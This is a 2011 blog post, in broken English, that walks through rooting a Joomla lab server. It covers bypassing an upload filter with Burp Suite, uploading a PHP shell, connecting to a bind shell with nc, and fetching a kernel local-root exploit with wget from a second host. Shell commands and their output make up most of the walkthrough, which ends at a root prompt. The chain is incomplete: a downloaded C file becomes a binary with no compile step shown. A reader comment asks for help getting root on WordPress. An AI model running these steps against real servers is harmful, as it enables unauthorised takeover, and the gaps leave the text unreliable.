Kamis, 28 Juli 2011

15.44

How to get ROOT in the system through the WEB application

Diposting oleh monyonk
Label: ,
Risk of web vulnerebility is very high, the malicous user can get the root system from his vulner. with root user we can do what we want. so,

I will to explain how to hack root user through web application, I recommend to build your own labbecause it is safer to learnlet's start ...!!! 

the fisrt, we search the web target, for example : http://10.42.43.18/joomla. vulner of in this web is LFI (local file inclusion) and upload file .i will utilize the vulner upload file..

i try to upload my shell into web, but my efforts failed.


ok.. now will use burpsuite to intercept and change the file type of my shell to be image/jpeg becouse allowed file type just image.

result ::>>


now i try to access my shell wich has uploaded into http://10.42.43.18/joomla/images/shell.php


now i can connect to the target trough bind shell backdoor..>
using comand 

root@virtual:/home/victim# nc 10.42.43.18 11457
bash: no job control in this shell

www-data@victim:/var/www/joomla/images$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@victim:/var/www/joomla/images$ uname -a
uname -a
Linux victim 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux
 
i've connected but id not yet root, i know the kernel 2.6.32 is vulner to local exploit you can download exploit here

www-data@victim:/var/www/joomla/images$ wget http://10.42.43.1/14814.c   
wget http://10.42.43.1/14814.c   
--2011-07-29 05:29:42--  http://10.42.43.1/14814.c
Connecting to 10.42.43.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15610 (15K) [text/x-csrc]
Saving to: `14814.c.1'

     0K .......... .....                                      100% 31.4M=0s

2011-07-29 05:29:42 (31.4 MB/s) - `14814.c.1' saved [15610/15610]
www-data@victim:/var/www/joomla/images$ ./local-exploit
./local-exploit
id
uid=0(root) gid=0(root)
su
id
uid=0(root) gid=0(root) groups=0(root)

bingo...!!!
now we have to be root in the system.

<:::I am sorry if there is wrong in writing, because my english is very bad:::>

1 komentar:

Anonim mengatakan...

hello,

i have downloaded the script and copied to victim machine, however, it produced about 8 lines of error

./license.c: 1: WordPress: not found
: not found: 2:
./license.c: 3: Copyright: not found
: not found: 4:
./license.c: 5: This: not found
./license.c: 5: you: not found
./license.c: 6: it: not found
./license.c: 7: the: not found
./license.c: 7: either: not found
./license.c: 8: Syntax error: word unexpected

Any suggestion, so I have shell access through uploading theme in WP but not root access.

Cheers
Ohanes

9 Juli 2018 pukul 22.41

Posting Komentar

Langganan: Posting Komentar (Atom)